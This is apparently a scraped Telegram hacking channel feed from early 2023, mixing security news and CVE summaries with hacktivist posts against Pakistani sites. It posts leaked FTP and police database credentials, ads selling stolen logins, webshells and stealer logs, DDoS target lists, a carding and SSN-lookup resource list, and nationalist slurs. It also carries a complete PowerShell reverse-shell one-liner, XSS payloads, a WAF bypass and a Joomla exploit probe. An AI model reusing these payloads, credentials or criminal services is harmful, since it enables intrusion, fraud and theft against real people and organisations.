Date Content Media
2023-03-30 01:07:34 data above 👆
2023-03-30 01:07:33
2023-03-30 01:07:26
2023-03-30 01:07:08
2023-03-30 01:07:07
2023-03-30 01:07:06
2023-03-29 18:50:42
2023-03-29 17:21:58
Pakistan Ministry Of Defence have been robbed. Defence Deal of China-Pakistan for 20 J-10CE & 240 PL-15E Missiles is displayed for your reference.
2023-03-29 16:37:08
2023-03-29 14:24:24
FTP Username: server: & explicit FTPS port: 21FTP pass : IndianCyberPwnage@w3b_1nj3c70r
2023-03-29 13:51:41
☢️ FOR SALE🚨 X1000 Wordpress Login 💎☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:100$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆➖➖➖➖➖➖➖➖➖➖ Images
2023-03-29 13:41:47
🔥 Free Access (Uploader) 💎🧑‍💻 @LegionLeaker
2023-03-29 11:24:29
🚨 FOR SALE☢️➖➖➖➖➖➖➖➖➖➖🪙Domain: & .id⭐️ ▶️ ▶️ ⭐️ ☢️ FOR SALE🚨➖➖➖➖➖➖➖➖➖➖💰 Price:60$🪙 Payment BTC 👉 For Buy: @Hajit00n 🏆
2023-03-29 03:21:29
None Images
2023-03-29 02:26:50
🚨 Viewers Discretion is Advised 🇵🇰 Reportedly 1 woman lost life and many injured in the rush to buy flour in Sahiwal Park, while the condition of three to four women is said to be critical : Local media Location: Sahiwal - Pakistan
2023-03-28 10:09:45
2023-03-28 09:40:21
A truck carrying ‘atta’ / flour is looted in Peshawar, Pakistan. But according to alleged factchecker Mohd. Zubair - India ranks 126th on the World Happiness Index, while Pakistan is at 108 in the same
2023-03-28 08:44:28
2023-03-28 07:29:47
database credentials of Bangladesh police 'I{0e$b{05CA{'
2023-03-28 06:52:54 😈Social Media Marketing Hacks at one place😁 Images
2023-03-28 06:34:04
Security Fucker🎨Hacking Site Hacked 😐grow th hacking bites 😈 Images
2023-03-28 02:45:41
pakcricknews 😂 Images
2023-03-28 02:30:29
Pakistan Documents Leaked. The information isn't really useful for novice users but could be useful for some registration purpose. download: Images
2023-03-28 02:21:05
📣-Welcome To Our Group VIP-💎➖➖➖➖➖➖➖➖➖➖💰-Price -25$ - ➖➖➖➖➖➖➖➖➖➖➡️ Shells Method & Paid Exploits➡️ Exploits - Leaked & Paid➡️ Stealers Logs - Fresh ➡️ ComboList - Leads - Mail Access ➡️ New Scampages 2022 - Priv8 ➡️ Tools useful for your work ➡️ Laravel - WordPress Exploits ➡️ cPanels - Mailers - Smtps➡️ Method Making Wordpress & Laravel Sites ➖➖➖➖➖➖➖➖➖➖ 🔛 Payment BTC ⚡️ JOIN NOW - @Hajit00n 🎨➖➖➖➖➖➖➖➖➖➖
2023-03-28 02:19:06
✅FOR SALE✅🛒Hacking Tools🛒Banking Logs🛒 Webshells🛒Laravel list🛒Wordpress list🛒 Email's List✅FOR SALE✅🛒 For Buy: @Hajit00n
2023-03-28 02:15:01
✅ sell Hight DA ⚡️💰 Price: 50$🛒 For Buy: @Hajit00n
2023-03-28 02:10:10
PK Admin 😈
2023-03-28 00:50:32
PK cpanel 😈
2023-03-28 00:46:40 🤘😈卩ro 爪Cracker 😂❤️
2023-03-28 00:26:21
💥How we broke PHP, hacked Pornhub and earned $20,000
tl;dr:
💾We have gained RCE on and have earned a $20,000 bug bounty on Hackerone.
💾We have found two UAF vulns in PHP’s GC algorithm.
💾Those vulnerabilities were remotely exploitable over PHP’s unserialize function.
💾We were also awarded with $2,000 by the Internet Bug Bounty committee (c.f. Hackerone). Images Images Images
2023-03-27 13:59:08 collection all rounder databaseShare now
2023-03-27 07:59:01 can join this channel
2023-03-26 13:57:51
ADVANCE FOOTPRINTING SESSION FOR BEGINNERS ✌️ BY - @x_cyanide_x TIME - 26 march (TODAY) at 7:30 PM OUR WEBSITE - system32.ink ONLY ON THIS DISCUSSION GROUP 👇👇👇 @cyberdemonsD #happyhacking
2023-03-26 12:01:19
2023-03-26 04:15:42
Mission Successful 🇮🇳🇮🇳🇮🇳
2023-03-25 19:18:23
🎈 Happy Birthday Sir @MCracker2002 🎈 You are the embodiment of optimism and hard work. 💕 Thank you for inspiring us every day. 💕 Happy 🎂 birthday wishes, Guruji @MCracker2002
2023-03-25 17:41:41
Hello guys I made a crypto hacking class how to 1.hack how to generate seed 2.brute forces of crypto seed 3.blockchain transaction finder 4.seed grabber 5.tron private key finder 12 phrases + 1 6.NFT seed grabber 7.Trust wallet Seed grabber 8.ledger and cold wallet Grabber8.brain flayer cracking 9.crypto phishing 10. Development of cold and hot wallet 11.cracking wallet.dat files @alex14324
2023-03-25 09:07:24
🍭 Free useful resources to learn Machine Learning 🍭👉 Google👉 Leetcode👉 Hackerrank👉 FreeCodeCamp👉 Kaggle👉 Geeksforgeeks👉 Create ML Models👉 Machine Learning Test Cheat Sheet━ POSTED BY @iishantt ━ 
2023-03-24 20:46:20
2023-03-24 14:42:37
2023-03-24 12:51:10
Remote unauthenticated system and cloud takeover found in major AI tool. March 24, 2023 at 05:24PM by FlyingTriangle via reddit
2023-03-24 12:31:31
2023-03-24 09:36:15
|Pwn2Own Vancouver 2023 - Day One Results|
💥 STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points.
💥 Bien Pham from Qrious Security used an OOB Read and a stack-based buffer overflow to exploit Oracle VirtualBox. He earns $40,000 and 4 Master of Pwn points.
💥 Synacktiv was able to execute their TOCTOU attack against Tesla – Gateway. They earn $100,000 as well as 10 Master of Pwn points and a Tesla Model 3.
💥 STAR Labs successfully executed their attack against Ubuntu Desktop, but the exploit was previously known. They still earn $15,000 and 1.5 Master of Pwn points.
💥 Marcin Wiązowski used an improper input validation bug to elevate privileges on Windows 11. He earns $30,000 and 3 Master of Pwn points.
💥 Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points.
2023-03-23 11:23:04
2023-03-23 09:48:21
2023-03-22 15:49:54
Join our group for Cyber security
2023-03-22 15:30:07
#USEFUL SITES TO USE ON (Some Links Not Up To Date)BROWSER FINGERPRINT TESThttps://panopticick.eff.org LICENSE GENERATORhttps://www.elfqrin.com LEAK TESTdnsleaktest.com OFFICE PHONE CODEShttps://www.allareacodes.comSMS VERIFICATIONSmspool.net PHONEhttps://www.spooftel.com / AGENT CHECKERhttp://whatsmyuseragent.comFAX SENDER UDEMY COURSEShttps://www.zapcourses.comhttps://www.freshersgold.comCUSTOM/FAKE RECEIPT MAKER VALIDATORhttp://www.ssnvalidator.comSSN DECODER CHECKER SEARCHhttp://www.feinsearch.comhttps://www.einfinder.comhtp:// RDP ACCEPTING BITCOINıxdedicvhnguh5s6k.onion/SSN/DOB SEARCHhttps://ssndob.cchttps://robocheck.cmMMN AUTOSEARCHarchives.comancestry.comBACKGROUND CHECKhttp://www.intelius.comhttp://checkmate.comhttp://equifax.comhttp://thatsthem.comhttps://www.mylife.com REPORThttps://www.quizzle.com➖➖➖➖➖➖➖➖➖➖
2023-03-22 12:21:51
💥"Actual" image recovery:
1️⃣ Take a JPEG image
2️⃣ Make a copy of it
3️⃣ Crop it in Snipping Tool
4️⃣ Save/overwrite
4️⃣ In a hex editor, overwrite the EOI Marker (0xFFD9)
5️⃣ Repair it at http://jpg.repair
6️⃣ Wonder how secure your cropped image data is
Images
2023-03-22 03:17:24
Mitigating SSRF in 2023. March 21, 2023 at 08:03PM by l_tennant via reddit
2023-03-21 00:48:07
bypass for the FortiWeb (Fortinet) WAF usage: "><iframe src=//> i.e. instead of the standard XSS payload to execute js Images
2023-03-21 00:44:38
2023-03-20 21:34:00
Join our group for more such Cyber security
2023-03-20 18:23:09
A video on Digital Forensics Volatility
2023-03-20 13:22:49
💥Shannon Baseband: Intra-object overflow in NrSmPcoCodec when decoding reserved options (CVE-2023-26076).
There is an intra-object overflow in Shannon Baseband, inside the 5G SM protocol implementation (NrSmMsgCodec as it’s called in Shannon according to debug strings), when decoding the “Extended protocol configuration options” message (IEI = 0x7B).
The problem is that the size of the content isn’t checked before copying it. As the length of content can be up to 255 bytes, copying the content to one of the 6 reservedPco buffers can result in an OOB write.
The array that holds the “Reserved” option data isn’t in a standalone allocation, rather this array is a part of a larger structure. Thus, an OOB write as described above overwrites other data within the same structure. It is currently unclear what kind of data lies after the 6 reservedPco buffers within reach of the overwrite.
🔖An “Extended protocol configuration options” message that triggers the overflow is provided in epco-reserved-poc.dat.
2023-03-19 08:10:13
PowerShell opens a TCP socket on the remote server and executes the input as a command, sending the output back.Stupid backdoor!usage:powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
2023-03-18 14:01:17
2023-03-18 11:57:53
Federal agents of U.S. law enforcement on Wednesday arrested Conor Brian Fitzpatrick, a Peekskill, New York resident, who allegedly operated the infamous dark web data breach site, "BreachForums." The site, which hosted stolen databases from nearly 1,000 companies and websites, has been a significant player in the cybercrime ecosystem.
Fitzpatrick, who went by the online alias "Pompompurin," was charged with a single count of conspiracy to commit access device fraud. BreachForums offered stolen personal information, including names, emails, and passwords, for sale to users. These databases were often used for fraudulent activities. Fitzpatrick's arrest took place at his home, where he admitted to using the alias "Pompompurin" and operating BreachForums.
In an affidavit filed with the District Court for the Southern District of New York, FBI Special Agent John Langmire said that at around 4:30 p.m. on March 15, 2023, he led a team of law enforcement agents that made a probable cause arrest of a Conor Brian Fitzpatrick in Peekskill, NY.
#stay safe while hacking "ethically" #Focus on your OPSEC Images
2023-03-18 11:24:41
This is the translated message of the same Russian group who put the screenshot of Hacked Indian Portals earlier. Now, Delivers the post attack confession.
2023-03-18 04:29:32
2023-03-17 13:53:18
2023-03-17 10:47:05
🔥Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems
Until security updates are available, users who wish to protect themselves from the baseband remote code execution vulnerabilities in Samsung’s Exynos chipsets can turn off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings. Turning off these settings will remove the exploitation risk of these vulnerabilities.
Chipsets to devices, affected products likely include:
💾Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series;
💾Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
💾The Pixel 6 and Pixel 7 series of devices from Google;
💾any wearables that use the Exynos W920 chipset; and
💾any vehicles that use the Exynos Auto T5123 chipset.
Images
2023-03-17 01:27:43
In India the best way to come in limelight or Increase Business is to abuse the sentiments against the nation itself, People will start talking about you or could be in your perimeter. Same happening in cybersecurity industry where online telegram users of so called company just see the posts of small kids attacking websites of India which don't have any severe vulnerability of Any APT level/type attack but portraits as huge attack or they are the best company. How ? With telegramic employees ?? Seriously !!! Employees Who see the posts of script kiddies on telegram and makes out the research report. No it will be wrong if i also said research report actually that is paid media reports which is published to make the company big. Earlier also that company with zero knowledge of employees published the report about malaysian hackers who were just a script Kiddies. In fact, There are many State Sponsored APT level workers who continuously work for the nation in every country, You never know. The real attacks should be researched out not any attacks which is publicly available. The old generation was disgusting in field of understanding the cybersecurity but these kind of people make this today's generation fool too.
2023-03-16 21:43:55
You can join our group for more such Cyber security
2023-03-16 21:42:20
2023-03-16 15:46:13
How Scammers Scam you To Show You How they hack Android using PDF They Use Old Adobe App (A RCE VULN. In IT) to Exploit Android full Blog:
2023-03-16 15:34:51
2023-03-16 13:16:17
2023-03-16 13:16:16
ETH 💸 MINER/FINDER SCAM exposed. By @Devil_Anon 💻☢️ Watch the video▶️ to see the illustration on how it's done, and get the code from our forum post below. Spread awareness🎙📞 and let more people be aware of this trick which many people are being ripped off upon. Share🌐 and support⭐️ @cyberhellcommunity
2023-03-16 08:37:29
2023-03-16 05:59:34
gg's hacker's ( have a good day —❤️ ‼️Here we go again Use AI to generate the perfect professional excuse 😂😂#hacker_bano_chutiya_nhe 👀👀
2023-03-15 12:13:48
2023-03-15 07:10:02
Vulnerabilities in the TPM 2.0 reference implementation code. Blog + TMP_vuln_POC =
2023-03-14 14:57:00
🔥Experimental navigation object contains a new DOM XSS source!
navigation.currentEntry.url
navigation.entries()[0].url
Images
2023-03-13 14:29:47
Join our group for Exclusive Cyber security, pen testing, bug hunting and ethical hacking content. Inviting you all to come and join our
2023-03-13 02:39:39
2023-03-12 20:36:51 our group for more such Cyber security content
2023-03-12 11:21:45
Nmap:- Firewall evasion/Bypass, MTU and fragmentation. By @Devil_Anon 😈
What is firewall evasion ❔
This technique refers to generating or manually specifying the IP Addresses of the decoys to evade IDS / Firewalls. It appears to the target as well as the host are scanning the network. This technique makes it really difficult for the IDS / Firewalls to determine which IP Address is actually scanning the network and which IP addresses are a decoy.
Show reactions 💯❤️ and enjoy the video. Share and promote @cyberhellcommunity Comment section :- HERE
2023-03-12 08:34:17
Hello Pakistan 👋 You don't have to panic.
2023-03-11 18:36:54 our group for more such Cyber security content
2023-03-11 08:43:05
⚡⚡WATCH AND SPREAD!!🇮🇳🇮🇳🔺@AngrySaffron
2023-03-11 06:48:16
2023-03-11 06:16:55
Summary: In span of 2 years NITB hosted 50-70+ internal portals for pakistan government. I think there is no need to write more.
2023-03-10 01:59:09
💥The Untold Story of the BlackLotus UEFI Bootkit
🔖Semantic-based rule to cover malicious bootloader components from the BlackLotus bootkit (for FwHunt Community Scanner)
2023-03-08 07:56:28
2023-03-08 07:36:34
There are some dreams in this merciless life that we are lost in the longing to attain. While the people of this world sleep in comfort, we stay passionately absorbed in our work.... Written by:- @lexlegion "Specially for Hacker's"
2023-03-08 07:25:20
Wishing you a very colorful and joyous Holi! On the happy occasion of Holi, may your life always be filled with the colors of joy and happiness.#Jai_Radhe_Krishna#DDoS_Evil_Family
2023-03-07 10:19:09
💥You can use the experimental 'navigation' object to trigger JS execution in Chrome.
<script>navigation.navigate('javascript:alert(1)')</script>
Images
2023-03-06 15:04:51 Pakistan#OPPK
2023-03-06 02:09:58
🤔CVE-2023-21716 (Microsoft Word RCE vuln) Python PoC
2023-03-06 01:15:11
2023-03-05 10:59:47
Check Out These SitesRedefaced By Indian Hackers 😘Power Of Indian Hackers &Feel The Power Of Indians🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮🇳🇮
2023-03-05 10:59:37
Hacked By EagleCyber #TeamArmyBawangMalaysia #StucxnetCrewMalaysia #Khalifahcybercrew #EagleCyber #GhostClanOffical #KingsmenWorld #GhostArmy16 #AnonManK #DarkHCyberXArmy #DarkCyberXPravasiArmy #DarkHCyberXArmy #NinjaCrewCyberGhost #UndergroundGhostCrew #pejuangcyber #LcmySecTeam #K𝐚𝐦𝐩𝐮𝐧𝐠G𝐡𝐨𝐬𝐭𝐀𝐜𝐚𝐝𝐞𝐦𝐲𝐃𝐃𝐨𝐬𝐂𝐫3𝐰 #KampungGhostDDosCyberArmy's#KomunitiSiberMalaysia
2023-03-05 04:15:37
2023-03-05 02:39:05
💥Nuclei-templates that help during the bug bounty hunting process.
2023-03-05 02:28:27
Cortex XDR Config Extractor is a tool meant to be used during Red Team Assessments and to audit the XDR Settings. With this tool it's possible to parse the Database Lock Files of the Cortex XDR Agent by Palo Alto Networks and extract Agent Settings, the Hash and Salt of the Uninstall Password, as well as possible Exclusions.
Supported Extractions:
Uninstall Password Hash & Salt
Excluded Signer Names
DLL Security Exclusions & Settings
PE Security Exclusions & Settings
Office Files Security Exclusions & Settings
Credential Gathering Module Exclusions
Webshell Protection Module Exclusions
Childprocess Executionchain Exclusions
Behavioral Threat Module Exclusions
Local Malware Scan Module Exclusions
Memory Protection Module Status
Global Hash Exclusions
Ransomware Protection Module Modus & Settings
Download:-
2023-03-04 10:59:02
The Land of missing people. That is what Balochistan is called by nowadays. Following the request of these people, we announce #OpBalochistan To the pakistan army and ISI, You lot really wouldn't last a minute with our penetration. But we do wish you enjoy XoXo ~GhostSec
2023-03-03 15:52:37
WEBSITE HACKING Tutorial✅🌐 (WORDPRESS) {Web Analysis, info Enumeration, CVE Analysis and Admin Panel Bruteforce.} By @Devil_Anon
Tool :- wpscan
O.S :- kali
What is website hacking ❔ website hacking is simply the unauthorized and attack infiltration unto the vulnerability of a website in order to get access to the admin panel.
Give reactions❤️ and enjoy the video✅ Comment Section HERE
2023-03-03 14:53:28
⚙️ CamOver is a camera exploitation tool that allows disclosure of the network camera admin password.
Features:
💾Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
💾Optimized to exploit multiple cameras at one time from list with threading enabled.
💾Simple CLI and API usage.
⚙️ CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.
Features:
💾Exploits vulnerabilities in most popular camera models such as Novo, CeNova and QSee.
💾Optimized to exploit multiple cameras at one time from list with threading enabled.
💾Simple CLI and API usage.
Images
2023-03-03 11:40:57 Shopping Site Down By DdoS_Evil 😈😘
2023-03-03 07:35:01
2023-03-02 14:46:36
2023-03-02 01:10:45 This Site Is Permanently Gone 😂😙 sites went offline.. expect more attacks from PH and IND #fakpakpakpak #fckistan
2023-03-01 11:34:16
2023-03-01 07:42:46
Best Web Crawling :
2023-03-01 05:02:17 😈DDoS Done😈After Bypassing CloudFlare 🖕 Share And Support😈😈Evils Always Remains Evil😈
2023-03-01 01:31:01
📲ssl-kill-switch3 is a next-generation of iOS Tweak SSLKillSwitch(2) with much more functionality! Images
2023-02-28 08:23:05
2023-02-28 00:25:03
Pakistan, can you see what we are doing there? 🥹 PHOENIX ❤ Images
2023-02-27 13:45:53
🔥APT38 Tactic PoC for Stealing 0-days
💾program based on APT38 North Korea-backed hackers tactic that used in targeting security researchers using a malicious Visual Studio project file (vcxproj) to steal their 0days.
💾Once the program runs, it will infect all of your Visual Studio projects
Download:-
2023-02-27 00:50:10
It seems to be the second week by now, I have already lost count. Pakistan still doesn't give a fuck.
2023-02-26 04:44:29
Hello Guys, I am making a Private Page on regarding OSINT. So if anyone wants to contribute or help me to make this project successful will be highly appreciated. If you are interested please contact me at if you want to be in my team please let me know.
2023-02-26 04:41:22 own repo for OSINT
2023-02-25 15:35:06
2023-02-25 08:02:34
😈When an evil hurts...😈DDoS Done of Targetted Country😈😈😈😈😈😈😈😈😈😈List of Pakistani Websites:-😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://laam.pk😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈https://www.pktrucks.com😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈😈For Support, Do Share As Much As Possible 😈
2023-02-25 07:59:49
2023-02-25 02:16:53
🔥Arm Mali: insufficient cache invalidation for non-page-aligned user buffer imports
When a user buffer is imported into Mali and mapped into the GPU, Mali calls dma_map_page(). This implicitly does a dcache_clean_poc() on the mapped range (unless the kernel knows that the device is DMA-coherent) to ensure that dirty cache state is written back to main memory before the user buffer can be accessed by the GPU and possibly also uncached mappings on the CPU.
However, when a user buffer is imported that does not begin/end at page boundaries, Mali still installs PTEs on the CPU and GPU that map the entire page, but only calls dma_map_page() on the user-specified range. This means that the rest of the page is mapped without any cache maintenance.
Therefore, when the GPU is not cache-coherent (which Jahn thinks means there's no ACE or ACE-Lite) or when Mali creates uncached CPU-side mappings, malicious code can read stale memory contents. This is a problem if the last cache writeback happened before the kernel's page allocator zeroed the page and handed it to userspace, since that means the stale data we're reading is whatever the previous user of the page wrote into it.
2023-02-25 01:54:25
2023-02-24 20:43:22
A new blog on OSINT Bug Hunting series. Learn dorks and filters of Shodan, LinkedIn, Dnsdumpster, GitHub dorks, Wayback machine, Google dorks and much more... Here is the link to the blog. Haven't seen the first part? Here is the link. Haven't seen the second part? Here is the link. Join our group for such exclusive
2023-02-24 16:33:45
⚠️⚠️⚠️⚠️⚠️⚠️⚠️Hello homies. Wait for uploading soon music share and support Wait wait every day 1 music upload soon and download linkI have 900 music you don't know how is good
2023-02-24 16:10:33
💥Fancy new way to conceal XSS payloads (Assignable protocol with location)
<script>location.protocol='javascript'</script>
2023-02-24 12:17:17
OpenSSH 9.1 exploit and Mass Scan
Vulnerability CVE-2023-25136 affects the SSH pre-authentication process. Using it, an attacker can corrupt memory and execute arbitrary code on a machine without being authenticated on the target server.
Download:
2023-02-24 12:11:06
💥Patchless/breakpoint in process amsi bypass thingy with C#
Download CS File:-
2023-02-24 12:00:30
❤️ is a fantastic website that offers a unique and exciting service similar to ChatGPT But Different is that its not ChatGPT All Your Answer Come Across To Our Bhagwat Geeta 🕉. Link : 🤞 Whether you want to know about science, technology, history, philosophy, or anything in between, has got you covered. It is designed to provide you with accurate and insightful answers to your queries, just like a human expert would. 🛕 Click Here To Visit
2023-02-24 02:23:09
CVE-2023-0754
PTC Thingworx Edge C-SDK twHeader_fromStream Integer Overflow RCE Vulnerability
CVE-2023-0755
PTC Thingworx Edge C-SDK mulitpartMessageStoreEntry_Create Array Indexing OOB Write RCE Vulnerability
Download POC exploit:
2023-02-23 21:12:57
Hi Everyone! A new Blog on Burp Suite. Let's learn how to use it like a Cyber Security Professional. A beginners blog to take your first step towards Burp Suite. Here is the link 🔗 Join our group for such exclusive
2023-02-23 15:26:01
2023-02-23 11:14:30
💥PS script to exploit ESC1/retrieve your own NTLM password hash using only built-in Windows binaries to generate the PFX.Download:
2023-02-22 12:18:46
2023-02-22 09:42:05
2023-02-22 09:42:04
2023-02-22 01:31:54
BREAKING: Russian hacker group Phoenix announces hacking major ministries of Pakistan Govt. The group called the hack "hacking the whole Pakistan." 🔺Just In: @AngrySaffron
2023-02-21 19:43:32
A blog on Nmap. Let's learn how to use Nmap. Nmap commands, Nmap cheat sheet, Nmap techniques. Here is a link to the blog. Join our group for more exclusive cyber security
2023-02-21 13:50:14
🔥🔥🔥Fortinet FortiNAC CVE-2022-39952 Deep-Dive, PoC and IOCs
An external control of file name or path vulnerability [CWE-73] in FortiNAC webserver may allow an unauthenticated attacker to perform arbitrary write on the system.
🔖PoC exploit here
2023-02-21 12:01:29
🔥🔥🔥REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB (CVE-2022-44563, Toc-ToU race condition vuln can be exploited to achieve arbitrary code execution)
This is a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Taszk advisory for the vulnerability is published here. The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, Lorant Szabo describes how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
2023-02-21 11:31:00
2023-02-21 04:59:04 Pakistan Bhen chod Team Insane PK Check Out These Sites🤣🤣🤣🤣😂😂🤣😂🤣😂
2023-02-20 07:54:59
CeWL
Custom Word List generator
Based on a discussion on PaulDotCom (episode 129) about creating custom word lists spidering a target's website and collecting unique words I decided to write CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.
2023-02-20 07:54:58
Commix
Automated All-in-One OS Command Injection Exploitation Tool. #redteam
2023-02-20 07:49:00
For basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon
2023-02-19 22:00:15
Wait is over! Here is the second part of the bug hunting series: Bug hunting with OSINT. Here is the link. Haven't seen the first part? Don't worry here is the link for that: Link for part 1: Join our group for such amazing and exclusive content. Don't miss, here is the link to join our
2023-02-19 02:54:09
Anonymous Spoof 😂😂 Porkies (pakistan/Bhikaristan) Now Anonymous Be Like: Ruin us, B*******
2023-02-19 01:52:38
2023-02-18 13:04:19
Kindly, Be assured that we will contribute in Pakistan's cyber defence & will keep access of everywhere in pakistan wherever they shift.
2023-02-18 06:51:41
2023-02-18 00:49:09
Heartfelt wishes for Maha Shivaratri 🚩
2023-02-17 23:30:52
You can also join our group for such exclusive
2023-02-17 23:30:01
Here is a video on Packet sniffing. If you like then Kindly subscribe and watch the video till end. It will be a great support from your side. Let's see: A video on Packet sniffing. Join our group for Exclusive content
2023-02-17 09:09:26
2023-02-17 05:41:49 Defecement with Phantom
2023-02-17 04:58:06
CVE-2023-23752
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'
2023-02-16 22:22:34
Hello everyone. A blog on packet sniffing using Wireshark for beginners who want to know how further use Wireshark. Let's see blog + video. Let's learn and grow. Here is a link to the blog. Join our group for more cyber security content. We are helping beginners to start their career in Cyber security. Here is the link to our Security
2023-02-16 13:50:35
2023-02-16 11:19:03
Cloud7 Bot 150$ For Free #GET SMTP/VPS/DATABASE From Config/Environment#WordPress Upload Shell (139 Exploit + Bypassing Shell)#WebMin 1,9xx Remote Code Execution#PresTaShop Upload Shell (57 Exploit +Bypassing Shell)#KcFinder,PHPUNIT,vBulletin,jQuery,osCommerce,Other Filemanager Mass upload shell#All CMS BRUTE FORCE 1000 WORDLISTS#Priv Bing Dorker 500 Page#Get IP From List Website #Joomla Upload Shell (102 Exploit + Bypassing Shell) <- Looping ExploitDownload:-
2023-02-16 10:17:25
2023-02-15 18:39:30
Hi Everyone! We all know lot of network based attacks are happening with the help of Wireshark. But do we really know how to use the Wireshark. Let's learn in detail like a professional. Use Wireshark like a Cyber Security Professional. Here is the link to the blog. You can learn lot of cyber security stuff on my website techofide.com Also join this group for more Cyber Security Professional
2023-02-15 14:09:02
EdgeGPT
Reverse engineered API of Microsoft's Bing Chat
2023-02-15 08:42:14
2023-02-15 00:13:59
✌️😎 I love trolling such madafaka tharki
2023-02-14 21:20:20
A new video on OSINT bug hunting. I recommend you to watch it and learn latest techniques of data gathering and reconnaissance
2023-02-14 15:19:23 #PakistanTerrorist #FckPak
2023-02-14 12:02:40
Yesterday I found a shell (backdoor) of a der-rupiya hackers probably sponsored by chavanni Intelligence agency in one of the Indian Govt website. The total number of govt website hosted on that server was 70+ there, so it means any or all 70 websites could have been defaced against Indian govt any time, or could have been used in other mean. It was part of my official work so can't disclose more about website or servers in this channel and you must be aware that these things doesn't come out. Although, Vulnerabilities is patched. The shell implant date was of 26th January 2023, the same timeline when nagpur shell implant/leak occurred. It's good that one foothold was removed but one man can't do everything, all the geeks should contribute and report at least pass the Intel's to make Indian cyberspace safe. Don't think what the country will give you, think what you will give to the country. Winding up, You know what fun is still remaining about those (Script-kiddies) ? They dropped shell and trace of Indonesian hackers. Wah, Pakistan, wah. 😂 Idiots, over here we can tell just from the walk who is a belly dancer and who is a bar dancer... 😉 😆😆
2023-02-14 09:17:54
2023-02-14 07:25:29
2023-02-13 21:30:54
Hello everyone! Here is our new article on Aircrack-ng. This will show you everything that you need to learn before start with a practical demonstration. Blog + Video
2023-02-13 16:05:45
📕Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
2023-02-13 09:44:59
2023-02-12 15:22:45
DDoS-Protection-Lite
Anti-DDoS-Lite (Anti-Crawler app) is a small PHP app to protect your site against DDoS attack.
2023-02-12 14:08:40
🔓CVE-2022-23935 exploit PoC exiftool version 12.37
Usage: ./CVE-2022-23935 <IP> <PORT>
Download:
2023-02-12 12:32:47
ConfFuzz
Fuzzing for Interface Vulnerabilities
ConfFuzz is an in-memory fuzzer aimed at detecting interface vulnerabilities in compartmentalized contexts. ConfFuzz is a cooperation between the University of Manchester, University Politehnica of Bucharest, Rice University, and It has been accepted to appear in NDSS'23.
2023-02-12 12:28:54
ExploitLeakedHandle: Identify and exploit leaked handles for local privilege escalation
2023-02-11 14:52:07
Hey everyone! Check out our another blog on SQL Injection. SQL Injection attack | Prevention | Cyber Security Professionals. Let's learn and grow together
2023-02-11 13:45:24
BokuLoader | is a Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities. Now supports: sleepmask, cleanup, and obfuscate evasion features! Download:
2023-02-11 11:44:48
2023-02-11 11:44:47
2023-02-11 11:04:14
Resources for Reverse Engineering Online Games #cybersecurity #infosec #hacking
2023-02-11 03:25:30
🔥🔥🔥 glibc-2.37 - incorrect printf output for integers with thousands separator and width field (CVE-2023-25139, BOF)

sprintf in the GNU C Library (glibc) 2.37 has a BOF (OOB) in some situations with a correct buffer size. This is unrelated to CWE-676. It may write beyond the bounds of the destination buffer when attempting to write a padded, thousands-separated string representation of a number, if the buffer is allocated the exact size required to represent that number as a string. For example, 1,234,567 (with padding to 13) overflows by two bytes.

Consider the following C program:

    #include <stdio.h>
    #include <locale.h>

    int main (void)
    {
      if (setlocale (LC_ALL, ""))
        {
          /* Ruler line: 13 columns followed by ':' */
          printf ("1234567890123:\n");
          /* Flags: zero-pad, sign, space, left-justify, grouping; width 13 */
          printf ("%0+ -'13ld:\n", 1234567L);
        }
      return 0;
    }

and try it with a locale that has a thousands separator, such as "LC_ALL=en_US.utf8".

With glibc up to 2.36, Vincent gets, as expected:

    1234567890123:
